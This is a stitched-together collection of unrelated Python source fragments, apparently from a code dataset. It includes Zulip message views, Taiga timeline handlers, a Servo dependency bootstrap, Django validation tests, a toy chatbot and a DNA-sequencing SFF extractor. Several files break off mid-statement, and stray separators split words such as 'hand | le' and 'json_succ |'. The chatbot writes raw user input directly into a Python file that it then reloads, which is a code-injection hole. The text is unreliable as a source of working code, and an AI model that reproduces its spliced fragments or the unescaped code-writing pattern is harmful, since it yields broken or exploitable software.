msg_dict = message_dicts[message_id]
msg_dict.update({"flags": user_message_flags[message_id]})
msg_dict.update(search_fields.get(message_id, {}))
message_list.append(msg_dict)
statsd.incr('loaded_old_messages', len(message_list))
ret = {'messages': message_list,
"result": "success",
"msg": ""}
return json_success(ret)
@authenticated_json_post_view
def json_update_flags(request, user_profile):
return update_message_flags(request, user_profile);
@has_request_variables
def update_message_flags(request, user_profile,
messages=REQ('messages', validator=check_list(check_int)),
operation=REQ('op'), flag=REQ('flag'),
all=REQ('all', validator=check_bool, default=False)):
request._log_data["extra"] = "[%s %s]" % (operation, flag)
do_update_message_flags(user_profile, operation, flag, messages, all)
return json_success({'result': 'success',
'messages': messages,
'msg': ''})
def create_mirrored_message_users(request, user_profile, recipients):
if "sender" not in request.POST:
return (False, None)
sender_email = request.POST["sender"].strip().lower()
referenced_users = set([sender_email])
if request.POST['type'] == 'private':
for email in recipients:
referenced_users.add(email.lower())
if request.client.name == "zephyr_mirror":
user_check = same_realm_zephyr_user
fullname_function = compute_mit_user_fullname
elif request.client.name == "irc_mirror":
user_check = same_realm_irc_user
fullname_function = compute_irc_user_fullname
elif request.client.name in ("jabber_mirror", "JabberMirror"):
user_check = same_realm_jabber_user
fullname_function = compute_jabber_user_fullname
else:
# Unrecognized mirroring client
return (False, None)
for email in referenced_users:
# Check that all referenced users are in our realm:
if not user_check(user_profile, email):
return (False, None)
# Create users for the referenced users, if needed.
for email in referenced_users:
create_mirror_user_if_needed(user_profile.realm, email, fullname_function)
sender = get_user_profile_by_email(sender_email)
return (True, sender)
def same_realm_zephyr_user(user_profile, email):
# Are the sender and recipient both @mit.edu addresses?
# We have to hand | le this specially, inferring the domain from the
# e-mail address, because the recipient may not existing in Zulip
# and we may need to make a stub MIT user on the fly.
try:
validators.validate_email(email)
except ValidationError:
return False
domain = resolve_email_to_domain(email)
return user_profile.realm.domain == "mit.edu" and domain == "mit.edu"
def same_realm_irc_user(user_profile, email):
# Check whether the target emai | l address is an IRC user in the
# same realm as user_profile, i.e. if the domain were example.com,
# the IRC user would need to be username@irc.example.com
try:
validators.validate_email(email)
except ValidationError:
return False
domain = resolve_email_to_domain(email)
return user_profile.realm.domain == domain.replace("irc.", "")
def same_realm_jabber_user(user_profile, email):
try:
validators.validate_email(email)
except ValidationError:
return False
domain = resolve_email_to_domain(email)
# The ist.mit.edu realm uses mit.edu email addresses so that their accounts
# can receive mail.
if user_profile.realm.domain == 'ist.mit.edu' and domain == 'mit.edu':
return True
return user_profile.realm.domain == domain
@authenticated_api_view
def api_send_message(request, user_profile):
return send_message_backend(request, user_profile)
@authenticated_json_post_view
def json_send_message(request, user_profile):
return send_message_backend(request, user_profile)
# We do not @require_login for send_message_backend, since it is used
# both from the API and the web service. Code calling
# send_message_backend should either check the API key or check that
# the user is logged in.
@has_request_variables
def send_message_backend(request, user_profile,
message_type_name = REQ('type'),
message_to = REQ('to', converter=extract_recipients, default=[]),
forged = REQ(default=False),
subject_name = REQ('subject', lambda x: x.strip(), None),
message_content = REQ('content'),
domain = REQ('domain', default=None),
local_id = REQ(default=None),
queue_id = REQ(default=None)):
client = request.client
is_super_user = request.user.is_api_super_user()
if forged and not is_super_user:
return json_error("User not authorized for this query")
realm = None
if domain and domain != user_profile.realm.domain:
if not is_super_user:
# The email gateway bot needs to be able to send messages in
# any realm.
return json_error("User not authorized for this query")
realm = get_realm(domain)
if not realm:
return json_error("Unknown domain " + domain)
if client.name in ["zephyr_mirror", "irc_mirror", "jabber_mirror", "JabberMirror"]:
# Here's how security works for mirroring:
#
# For private messages, the message must be (1) both sent and
# received exclusively by users in your realm, and (2)
# received by the forwarding user.
#
# For stream messages, the message must be (1) being forwarded
# by an API superuser for your realm and (2) being sent to a
# mirrored stream (any stream for the Zephyr and Jabber
# mirrors, but only streams with names starting with a "#" for
# IRC mirrors)
#
# The security checks are split between the below code
# (especially create_mirrored_message_users which checks the
# same-realm constraint) and recipient_for_emails (which
# checks that PMs are received by the forwarding user)
if "sender" not in request.POST:
return json_error("Missing sender")
if message_type_name != "private" and not is_super_user:
return json_error("User not authorized for this query")
(valid_input, mirror_sender) = \
create_mirrored_message_users(request, user_profile, message_to)
if not valid_input:
return json_error("Invalid mirrored message")
if client.name == "zephyr_mirror" and user_profile.realm.domain != "mit.edu":
return json_error("Invalid mirrored realm")
if (client.name == "irc_mirror" and message_type_name != "private" and
not message_to[0].startswith("#")):
return json_error("IRC stream names must start with #")
sender = mirror_sender
else:
sender = user_profile
ret = check_send_message(sender, client, message_type_name, message_to,
subject_name, message_content, forged=forged,
forged_timestamp = request.POST.get('time'),
forwarder_user_profile=user_profile, realm=realm,
local_id=local_id, sender_queue_id=queue_id)
return json_succ |
import pygame
from pygame.colordict import T | HECOLORS
import data
class Platform(pygame.sprite.Sprite):
def __init__(self, width, height):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.Surface([width, height])
self.image.fill(THECOLORS["green"])
self.rect = self.image.get_rect()
class Trampoline(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.image = data.load_image("trampoline.p | ng")
self.rect = self.image.get_rect()
|
# Copyright (C) 2014 Andrey Antukh <niwi@niwi.be>
# Copyright (C) 2014 Jesús Espino <jespinog@gmail.com>
# Copyright (C) 2014 David Barragán <bameda@dbarragan.com>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.conf import settings
from django.utils import timezone
from django.utils.translation import ugettext as _
from taiga.projects.history import services as history_services
from taiga.projects.models import Project
from taiga.users.models import User
from taiga.projects.history.choices import HistoryType
from taiga.timeline.service import (push_to_timeline,
build_user_namespace,
build_project_namespace,
extract_user_info)
# TODO: Add events to followers timeline when followers are implemented.
# TODO: Add events to project watchers timeline when project watchers are implemented.
def _push_to_timeline(*args, **kwargs):
if settings.CELERY_ENABLED:
push_to_timeline.delay(*args, **kwargs)
else:
push_to_timeline(*args, **kwargs)
def _push_to_timelines(project, user, obj, event_type, created_datetime, extra_data={}):
if project is not None:
# Actions related with a project
## Project timeline
_push_to_timeline(project, obj, event_type, created_datetime,
namespace=build_project_namespace(project),
extra_data=extra_data)
## User profile timelines
## - Me
related_people = User.objects.filter(id=user.id)
## - Owner
if hasattr(obj, "owner_id") and obj.owner_id:
related_people |= User.objects.filter(id=obj.owner_id)
## - Assigned to
if hasattr(obj, "assigned_to_id") and obj.assigned_to_id:
related_people |= User.objects.filter(id=obj.assigned_to_id)
## - Watchers
watchers = getattr(obj, "watchers", None)
if watchers:
related_people |= obj.watchers.all()
## - Exclude inactive and system users and remove duplicate
related_people = related_people.exclude(is_active=False)
related_people = related_people.exclude(is_system=True)
related_people = related_people.distinct()
_push_to_timeline(related_people, obj, event_type, created_datetime,
namespace=build_user_namespace(user),
extra_data=extra_data)
else:
# Actions not related with a project
## - Me
_push_to_timeline(user, obj, event_type, created_datetime,
namespace=build_user_namespace(user),
extra_data=extra_data)
def _clean_description_fields(values_diff):
# Description_diff and description_html if included can be huge, we are
# removing the html one and clearing the diff
values_diff.pop("description_html", None)
if "description_diff" in values_diff:
values_diff["description_diff"] = _("Check the history API for the exact diff")
def on_new_history_entry(sender, instance, created, **kwargs):
if instance._importing:
return
if instance.is_hidden:
return None
model = history_services.get_model_from_key(instance.key)
pk = history_services.get_pk_from_key(instance.key)
obj = model.objects.get(pk=pk)
project = obj.project
if instance.type == HistoryType.create:
event_type = "create"
elif instance.type == HistoryType.change:
event_type = "change"
elif instance.type == HistoryType.delete:
event_type = "delete"
user = User.objects.get(id=instance.user["pk"])
values_diff = instance.values_diff
_clean_description_fields(values_diff)
extra_data = {
"values_diff": values_diff,
"user": extract_user_info(user),
"comment": instance.comment,
"comment_html": instance.comment_html,
}
# Detect deleted comment
if instance.delete_comment_date:
extra_data["comment_deleted"] = True
created_datetime = instance.created_at
_push_to_timelines(project, user, obj, event_type, created_datetime, extra_data=extra_data)
def create_membership_push_to_timelin | e(sender, instance, **kwargs):
"""
Creating new membership with associated user. If the user is the project owner we don't
do anything because that info will be shown in created project timeline entry
@param sender: Membership model
@param instance: Membership object
"""
# We shown in created project timeline entry
if not instance.pk | and instance.user and instance.user != instance.project.owner:
created_datetime = instance.created_at
_push_to_timelines(instance.project, instance.user, instance, "create", created_datetime)
# Updating existing membership
elif instance.pk:
try:
prev_instance = sender.objects.get(pk=instance.pk)
if instance.user != prev_instance.user:
created_datetime = timezone.now()
# The new member
_push_to_timelines(instance.project, instance.user, instance, "create", created_datetime)
# If we are updating the old user is removed from project
if prev_instance.user:
_push_to_timelines(instance.project,
prev_instance.user,
prev_instance,
"delete",
created_datetime)
except sender.DoesNotExist:
# This happens with some tests, when a membership is created with a concrete id
pass
def delete_membership_push_to_timeline(sender, instance, **kwargs):
if instance.user:
created_datetime = timezone.now()
_push_to_timelines(instance.project, instance.user, instance, "delete", created_datetime)
def create_user_push_to_timeline(sender, instance, created, **kwargs):
if created:
project = None
user = instance
_push_to_timelines(project, user, user, "create", created_datetime=user.date_joined)
|
main"], force)
run_as_root(["apt-get", "update"])
run_as_root(["apt-get", "install", "clang-4.0"], force)
return gcc or clang
def check_gstreamer_lib():
return subprocess.call(["pkg-config", "gstreamer-1.0 >= 1.12"],
stdout=PIPE, stderr=PIPE) == 0
def run_as_root(command, force=False):
if os.geteuid() != 0:
command.insert(0, 'sudo')
if force:
command += "-y"
return subprocess.call(command)
def install_linux_deps(context, pkgs_ubuntu, pkgs_fedora, force):
install = False
pkgs = []
if context.distro == 'Ubuntu':
command = ['apt-get', 'install']
pkgs = pkgs_ubuntu
if subprocess.call(['dpkg', '-s'] + pkgs, stdout=PIPE, stderr=PIPE) != 0:
install = True
elif context.distro in ['CentOS', 'CentOS Linux', 'Fedora']:
installed_pkgs = str(subprocess.check_output(['rpm', '-qa'])).replace('\n', '|')
| pkgs = pkgs_fedora
for p in pkgs:
command = ['dnf', 'install']
if "|{}".format(p) not in installed_pkgs:
install = True
break
if install:
if | force:
command.append('-y')
print("Installing missing dependencies...")
run_as_root(command + pkgs)
return True
return False
def install_salt_dependencies(context, force):
pkgs_apt = ['build-essential', 'libssl-dev', 'libffi-dev', 'python-dev']
pkgs_dnf = ['gcc', 'libffi-devel', 'python-devel', 'openssl-devel']
if not install_linux_deps(context, pkgs_apt, pkgs_dnf, force):
print("Dependencies are already installed")
def gstreamer(context, force=False):
cur = os.curdir
gstdir = os.path.join(cur, "support", "linux", "gstreamer")
if not os.path.isdir(os.path.join(gstdir, "gstreamer", "lib")):
subprocess.check_call(["bash", "gstreamer.sh"], cwd=gstdir)
return True
return False
def bootstrap_gstreamer(context, force=False):
if not gstreamer(context, force):
print("gstreamer is already set up")
return 0
def linux(context, force=False):
# Please keep these in sync with the packages in README.md
pkgs_apt = ['git', 'curl', 'autoconf', 'libx11-dev', 'libfreetype6-dev',
'libgl1-mesa-dri', 'libglib2.0-dev', 'xorg-dev', 'gperf', 'g++',
'build-essential', 'cmake', 'python-pip',
'libbz2-dev', 'libosmesa6-dev', 'libxmu6', 'libxmu-dev', 'libglu1-mesa-dev',
'libgles2-mesa-dev', 'libegl1-mesa-dev', 'libdbus-1-dev', 'libharfbuzz-dev',
'ccache', 'clang', 'autoconf2.13']
pkgs_dnf = ['libtool', 'gcc-c++', 'libXi-devel', 'freetype-devel',
'mesa-libGL-devel', 'mesa-libEGL-devel', 'glib2-devel', 'libX11-devel',
'libXrandr-devel', 'gperf', 'fontconfig-devel', 'cabextract', 'ttmkfdir',
'python2', 'python2-virtualenv', 'python2-pip', 'expat-devel', 'rpm-build',
'openssl-devel', 'cmake', 'bzip2-devel', 'libXcursor-devel', 'libXmu-devel',
'mesa-libOSMesa-devel', 'dbus-devel', 'ncurses-devel', 'harfbuzz-devel',
'ccache', 'mesa-libGLU-devel', 'clang', 'clang-libs', 'gstreamer1-devel',
'gstreamer1-plugins-base-devel', 'gstreamer1-plugins-bad-free-devel', 'autoconf213']
if context.distro == "Ubuntu":
if context.distro_version == "17.04":
pkgs_apt += ["libssl-dev"]
elif int(context.distro_version.split(".")[0]) < 17:
pkgs_apt += ["libssl-dev"]
else:
pkgs_apt += ["libssl1.0-dev"]
if context.distro_version == "14.04":
pkgs_apt += ["python-virtualenv"]
else:
pkgs_apt += ["virtualenv"]
pkgs_apt += ['libgstreamer1.0-dev', 'libgstreamer-plugins-base1.0-dev',
'libgstreamer-plugins-bad1.0-dev']
elif context.distro == "Debian" and context.distro_version == "Sid":
pkgs_apt += ["libssl-dev"]
else:
pkgs_apt += ["libssl1.0-dev"]
installed_something = install_linux_deps(context, pkgs_apt, pkgs_dnf, force)
if not check_gstreamer_lib():
installed_something |= gstreamer(context, force)
if context.distro == "Ubuntu" and context.distro_version == "14.04":
installed_something |= install_trusty_deps(force)
if not installed_something:
print("Dependencies were already installed!")
return 0
def salt(context, force=False):
# Ensure Salt dependencies are installed
install_salt_dependencies(context, force)
# Ensure Salt is installed in the virtualenv
# It's not instaled globally because it's a large, non-required dependency,
# and the installation fails on Windows
print("Checking Salt installation...", end='')
reqs_path = os.path.join(context.topdir, 'python', 'requirements-salt.txt')
process = subprocess.Popen(
["pip", "install", "-q", "-I", "-r", reqs_path],
stdout=PIPE,
stderr=PIPE
)
process.wait()
if process.returncode:
out, err = process.communicate()
print('failed to install Salt via pip:')
print('Output: {}\nError: {}'.format(out, err))
return 1
print("done")
salt_root = os.path.join(context.sharedir, 'salt')
config_dir = os.path.join(salt_root, 'etc', 'salt')
pillar_dir = os.path.join(config_dir, 'pillars')
# In order to allow `mach bootstrap` to work from any CWD,
# the `root_dir` must be an absolute path.
# We place it under `context.sharedir` because
# Salt caches data (e.g. gitfs files) in its `var` subdirectory.
# Hence, dynamically generate the config with an appropriate `root_dir`
# and serialize it as JSON (which is valid YAML).
config = {
'hash_type': 'sha384',
'master': 'localhost',
'root_dir': salt_root,
'state_output': 'changes',
'state_tabular': True,
}
if 'SERVO_SALTFS_ROOT' in os.environ:
config.update({
'fileserver_backend': ['roots'],
'file_roots': {
'base': [os.path.abspath(os.environ['SERVO_SALTFS_ROOT'])],
},
})
else:
config.update({
'fileserver_backend': ['git'],
'gitfs_env_whitelist': 'base',
'gitfs_provider': 'gitpython',
'gitfs_remotes': [
'https://github.com/servo/saltfs.git',
],
})
if not os.path.exists(config_dir):
os.makedirs(config_dir, mode=0o700)
with open(os.path.join(config_dir, 'minion'), 'w') as config_file:
config_file.write(json.dumps(config) + '\n')
# Similarly, the pillar data is created dynamically
# and temporarily serialized to disk.
# This dynamism is not yet used, but will be in the future
# to enable Android bootstrapping by using
# context.sharedir as a location for Android packages.
pillar = {
'top.sls': {
'base': {
'*': ['bootstrap'],
},
},
'bootstrap.sls': {
'fully_managed': False,
},
}
if os.path.exists(pillar_dir):
shutil.rmtree(pillar_dir)
os.makedirs(pillar_dir, mode=0o700)
for filename in pillar:
with open(os.path.join(pillar_dir, filename), 'w') as pillar_file:
pillar_file.write(json.dumps(pillar[filename]) + '\n')
cmd = [
# sudo escapes from the venv, need to use full path
find_executable('salt-call'),
'--local',
'--config-dir={}'.format(config_dir),
'--pillar-root={}'.format(pillar_dir),
'state.apply',
'servo-build-dependencies',
]
if not force:
print('Running bootstrap in dry-run mode to show changes')
# Because `test=True` mode runs each state individually without
# considering how required/previous states affect the system,
# it will often report states with requisites as failing due
# to the requisites not actually being run,
# even though these are spurious and will succeed during
# the actual |
from django import forms
from django.test import TestCase
from django.core.exceptions import NON_FIELD_ERRORS
from modeltests.validation import ValidationTestCase
from modeltests.validation.models import Author, Article, ModelToValidate
# Import other tests for this package.
from modeltests.validation.validators import TestModelsWithValidators
from modeltests.validation.test_unique import (GetUniqueCheckTests,
PerformUniqueChecksTest)
from modeltests.validation.test_custom_messages import CustomMessagesTest
class BaseModelValidationTests(ValidationTestCase):
def test_missing_required_field_raises_error(self):
mtv = ModelToValidate(f_with_custom_validator=42)
self.assertFailsValidation(mtv.full_clean, ['name', 'number'])
def test_with_correct_value_model_validates(self):
mtv = ModelToValidate(number=10, name='Some Name')
self.assertEqual(None, mtv.full_clean())
def test_custom_validate_method(self):
mtv = ModelToValidate(number=11)
self.assertFailsValidation(mtv.full_clean, [NON_FIELD_ERRORS, 'name'])
def test_wrong_FK_value_raises_error(self):
mtv=ModelToValidate(number=10, name='Some Name', parent_id=3)
self.assertFailsValidation(mtv.full_clean, ['parent'])
def test_correct_FK_value_validates(self):
parent = ModelToValidate.objects.create(number=10, name='Some Name')
mtv = ModelToValidate(number=10, name='Some Name', parent_id=parent.pk)
self.assertEqual(None, mtv.full_clean())
def test_limited_FK_raises_error(self):
# The limit_choices_to on the parent field says that a parent object's
# number attribute must be 10, so this should fail validation.
parent = ModelToValidate.objects.create(number=11, name='Other Name')
mtv = ModelToValidate(number=10, name='Some Name', parent_id=parent.pk)
self.assertFailsValidation(mtv.full_clean, ['parent'])
def test_wrong_email_value_raises_error(self):
mtv = ModelToValidate(number=10, name='Some Name', email='not-an-email')
self.assertFailsValidation(mtv.full_clean, ['email'])
def test_correct_email_value_passes(self):
mtv = ModelToValidate(number=10, name='Some Name', email='valid@email.com')
self.assertEqual(None, mtv.full_clean())
def test_wrong_url_value_raises_error(self):
mtv = ModelToValidate(number=10, name='Some Name', url='not a url')
self.assertFieldFailsValidationWithMessage(mtv.full_clean, 'url', [u'Enter a valid value.'])
def test_correct_url_but_nonexisting_gives_404(self):
mtv = ModelToValidate(number=10, name='Some Name', url='http://google.com/we-love-microsoft.html')
self.assertFieldFailsValidationWithMessage(mtv.ful | l_clean, 'url', [u'This URL appears to be a broken link.'])
def test_correct_url_value_passes(self):
mtv = ModelToValidate(number=10, name='Some Name', url='http://www.djangoproject.com/')
self.assertEqual(None, mtv.full_clean()) # This will fail if there's no Internet connection
def test_correct_https_url_but_nonexisting(self):
mtv = ModelToValidate(number=10, name='Some Name', url='https://www.djangoproject.com/')
self.assertFieldFailsValidat | ionWithMessage(mtv.full_clean, 'url', [u'This URL appears to be a broken link.'])
def test_correct_ftp_url_but_nonexisting(self):
mtv = ModelToValidate(number=10, name='Some Name', url='ftp://ftp.google.com/we-love-microsoft.html')
self.assertFieldFailsValidationWithMessage(mtv.full_clean, 'url', [u'This URL appears to be a broken link.'])
def test_correct_ftps_url_but_nonexisting(self):
mtv = ModelToValidate(number=10, name='Some Name', url='ftps://ftp.google.com/we-love-microsoft.html')
self.assertFieldFailsValidationWithMessage(mtv.full_clean, 'url', [u'This URL appears to be a broken link.'])
def test_text_greater_that_charfields_max_length_raises_erros(self):
mtv = ModelToValidate(number=10, name='Some Name'*100)
self.assertFailsValidation(mtv.full_clean, ['name',])
class ArticleForm(forms.ModelForm):
class Meta:
model = Article
exclude = ['author']
class ModelFormsTests(TestCase):
def setUp(self):
self.author = Author.objects.create(name='Joseph Kocherhans')
def test_partial_validation(self):
# Make sure the "commit=False and set field values later" idiom still
# works with model validation.
data = {
'title': 'The state of model validation',
'pub_date': '2010-1-10 14:49:00'
}
form = ArticleForm(data)
self.assertEqual(form.errors.keys(), [])
article = form.save(commit=False)
article.author = self.author
article.save()
def test_validation_with_empty_blank_field(self):
# Since a value for pub_date wasn't provided and the field is
# blank=True, model-validation should pass.
# Also, Article.clean() should be run, so pub_date will be filled after
# validation, so the form should save cleanly even though pub_date is
# not allowed to be null.
data = {
'title': 'The state of model validation',
}
article = Article(author_id=self.author.id)
form = ArticleForm(data, instance=article)
self.assertEqual(form.errors.keys(), [])
self.assertNotEqual(form.instance.pub_date, None)
article = form.save()
def test_validation_with_invalid_blank_field(self):
# Even though pub_date is set to blank=True, an invalid value was
# provided, so it should fail validation.
data = {
'title': 'The state of model validation',
'pub_date': 'never'
}
article = Article(author_id=self.author.id)
form = ArticleForm(data, instance=article)
self.assertEqual(form.errors.keys(), ['pub_date'])
|
import os
import sys as sys
os.system("python bot/bot.py engage")
import bot_response as bot
import bot_learn as learner
def hasUserSwore(message):
if "fuck" in message:
return True
elif "bitch" in message:
return True
elif "Fuck" in message:
return True
elif "Bitch" in message:
return True
else:
return False
#Allow the user to communicate with the bot
#Also allow the bot to learn about the person
def toBot():
if(os.path.isfile(".bot_engage")):
print "You can only run one instance of Clarissa."
else:
swearNum = 1
messageToBot = raw_input("Message: ")
if(messageToBot == "--add-command"):
writeCommand(command=raw_input("Command: "), response=raw_input("Responses: "))
reload(bot)
elif(messageToBot == "kill-bot"):
exit()
elif(messageToBot == "--clear-commands"):
#os.remove("commands | .bot")
#os.remove("responses.bot")
os.remove("bot_response.py")
writeCommand("Hello", "Hi")
print "Cleared commands"
elif(messageToBot == "learn"):
learner.learn(db_supp | ort=False)
elif(messageToBot == "--get-commands"):
commandsList = open("commands.list","r")
print commandsList.read()
bot.getResponse(messageToBot)
toBot()
def writeCommand(command, response):
file = open("bot_response.py", "a")
file.write("\n\telif(messageToBot == \""+command+"\"):")
file.write("\n\t\tprint \"Clarissa: "+response+"\"")
file.flush()
file.close()
commandList = open("commands.list", "w")
commandList.write(command)
commandList.flush()
commandList.close()
def getIf(message, command, response):
if(message == command):
print "Clarissa: "+response
else:
print "I do not understand "+message
def getCommands():
return open("commands.bot", "r").read()
def getResponses():
return open("responses.bot", "r").read()
swearNum = 0
try:
if(sys.argv[1] == "--add-command"):
writeCommand(command=sys.argv[2], response=sys.argv[3])
reload(bot)
elif (sys.argv[1] == "--clear-commands"):
#os.remove("commands.bot")
#os.remove("responses.bot")
os.remove("bot_response.py")
writeCommand("Hello", "Hi")
print "Cleared commands"
elif (sys.argv[1] == "learn"):
learner.learn(db_support=False)
elif (sys.argv[1] == "--get-commands"):
commandsList = open("commands.list","r")
print commandsList.read()
else:
toBot()
except IndexError:
toBot()
|
__aut | hor__ | = 'thuy'
|
# Copyright 2012 Jose Blanca, | Peio Ziarsolo, COMAV-Univ. Politecnica Valencia
# This file is part of ngs_crumbs.
# ngs_crumbs is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# ngs_crumbs is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; withou | t even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with ngs_crumbs. If not, see <http://www.gnu.org/licenses/>.
from __future__ import division
from array import array
from crumbs.utils.optional_modules import SffIterator
# pylint: disable=R0913
def _min_left_clipped_seqs(sff_fhand, trim, min_left_clip):
'It generates sequences (as tuples) given a path to a SFF file.'
for record in SffIterator(sff_fhand, trim=False):
annots = record.annotations
clip_qual = annots['clip_qual_left']
clip_adapt = annots['clip_adapter_left']
clip = max(min_left_clip, clip_qual, clip_adapt)
seq = record.seq
if trim:
record.annotations = {}
record = record[clip:]
else:
annots['clip_qual_left'] = clip
annots['clip_adapter_left'] = clip
seq = seq[:clip].lower() + seq[clip:].upper()
quals = record.letter_annotations['phred_quality']
record.letter_annotations = {}
record.seq = seq
dict.__setitem__(record._per_letter_annotations,
"phred_quality", quals)
yield record
class SffExtractor(object):
'This class extracts the reads from an SFF file'
def __init__(self, sff_fhands, trim=False, min_left_clip=0,
nucls_to_check=50, max_nucl_freq_threshold=0.5):
'It inits the class'
self.fhands = sff_fhands
self.trim = trim
self.min_left_clip = min_left_clip
# checking
self.nucls_to_check = nucls_to_check
self.max_nucl_freq_threshold = max_nucl_freq_threshold
self.nucl_counts = {}
@property
def seqs(self):
'It yields all sequences'
for fhand in self.fhands:
self._prepare_nucl_counts(fhand.name)
if not self.min_left_clip:
seqs = SffIterator(fhand, trim=self.trim)
else:
seqs = _min_left_clipped_seqs(fhand, self.trim,
self.min_left_clip)
for record in seqs:
self._update_nucl_counts(str(record.seq), fhand.name)
yield record
def _prepare_nucl_counts(self, fpath):
'It prepares the structure to store the nucleotide counts'
counts = {'A': array('L', [0] * self.nucls_to_check),
'T': array('L', [0] * self.nucls_to_check),
'C': array('L', [0] * self.nucls_to_check),
'G': array('L', [0] * self.nucls_to_check)}
self.nucl_counts[fpath] = counts
def _update_nucl_counts(self, seq, fpath):
'Given a seq (as a string) it updates the nucleotide counts'
seq = seq[:self.nucls_to_check]
counts = self.nucl_counts
for index, nucl in enumerate(seq):
try:
counts[fpath][nucl][index] += 1
except KeyError:
pass # we do not count the lowercase letters
@property
def clip_advice(self):
'It checks how many positions have a high max nucl freq.'
advices = {}
for fhand in self.fhands:
fpath = fhand.name
counts = self.nucl_counts[fpath]
treshold = self.max_nucl_freq_threshold
pos_above_threshold = 0
seq_above_threshold = ''
index = 0
for index in range(self.nucls_to_check):
num_nucls = [counts['A'][index], counts['T'][index],
counts['C'][index], counts['G'][index]]
tot_nucls = sum(num_nucls)
if not tot_nucls:
continue
freq_nucls = [i / tot_nucls for i in num_nucls]
above_threshold = [i >= treshold for i in freq_nucls]
if any(above_threshold):
pos_above_threshold += 1
seq_above_threshold += _get_nucl_with_max_freq('ATCG',
freq_nucls)
else:
break
if pos_above_threshold:
if self.trim:
# number of nucleotides to remove next time, the ones
# that we have detected plus the ones already removed
advice = index + self.min_left_clip, seq_above_threshold
else:
advice = index, seq_above_threshold
else:
advice = None
advices[fpath] = advice
return advices
def _do_seq_xml(seq):
seq = seq.object
annots = seq.annotations
read_len = len(seq)
read_name = seq.id
if 'E3MFGYR02FTGED' == read_name:
print annots, read_len
qual_left = annots.get('clip_qual_left', 0)
qual_right = annots.get('clip_qual_right', 0)
vector_left = annots.get('clip_adapter_left', 0)
vector_right = annots.get('clip_adapter_right', 0)
if vector_right >= read_len:
vector_right = 0
if qual_right >= read_len:
qual_right = 0
qual_left = 0 if qual_left < 0 else qual_left
qual_right = 0 if qual_right < 0 else qual_right
vector_left = 0 if vector_left < 0 else vector_left
vector_right = 0 if vector_right < 0 else vector_right
xml = '\t<trace>\n'
xml += '\t\t<trace_name>{}</trace_name>\n'.format(read_name)
if qual_left:
xml += '\t\t<clip_quality_left>{}</clip_quality_left>\n'.format(int(qual_left) + 1)
if qual_right:
xml += '\t\t<clip_quality_rigth>{}</clip_quality_rigth>\n'.format(qual_right)
if vector_left:
xml += '\t\t<clip_vector_left>{}</clip_vector_left>\n'.format(int(vector_left) + 1)
if vector_right:
xml += '\t\t<clip_vector_rigth>{}</clip_vector_rigth>\n'.format(vector_right)
xml += '\t</trace>\n'
return xml
def write_xml_traceinfo(seqs, fhand):
fhand.write('<?xml version="1.0"?>\n<trace_volume>\n')
for seq in seqs:
fhand.write(_do_seq_xml(seq))
yield seq
fhand.write('</trace_volume>\n')
fhand.flush()
def _get_nucl_with_max_freq(nucls, freq_nucls):
'It returns the nucleotide with the maximum frequency'
max_ = None
for index, freq in enumerate(freq_nucls):
if max_ is None or max_ < freq:
max_ = freq
nucl = nucls[index]
return nucl
|
from django.conf.urls import url
from fundraiser_app import views
urlpatterns = [
url(r'^$', views.FMItemListView.as_view(), name='fmitem_list'),
url(r'^about/$', views.AboutView.as_view(), name='about'),
url(r'^fmitem/(?P<pk>\d+)$', views.FMItemDetailView.as_view(), name='fmitem_detail'),
url(r'^fmitem/new$', views.FMItemCreateView.as_view(), name='fmitem_new'),
url(r'^fmite | m/(?P<pk>\d+)/edit$', views.FMItemUpdateView.as_view(), name='fmitem_edit'),
url(r'^fmitem/(?P<pk>\d+)/remove$', views.FMItemDeleteView.as_view(), name='f | mitem_remove'),
url(r'^fmitem/(?P<pk>\d+)/publish/$', views.fmitem_publish, name='fmitem_publish'),
]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.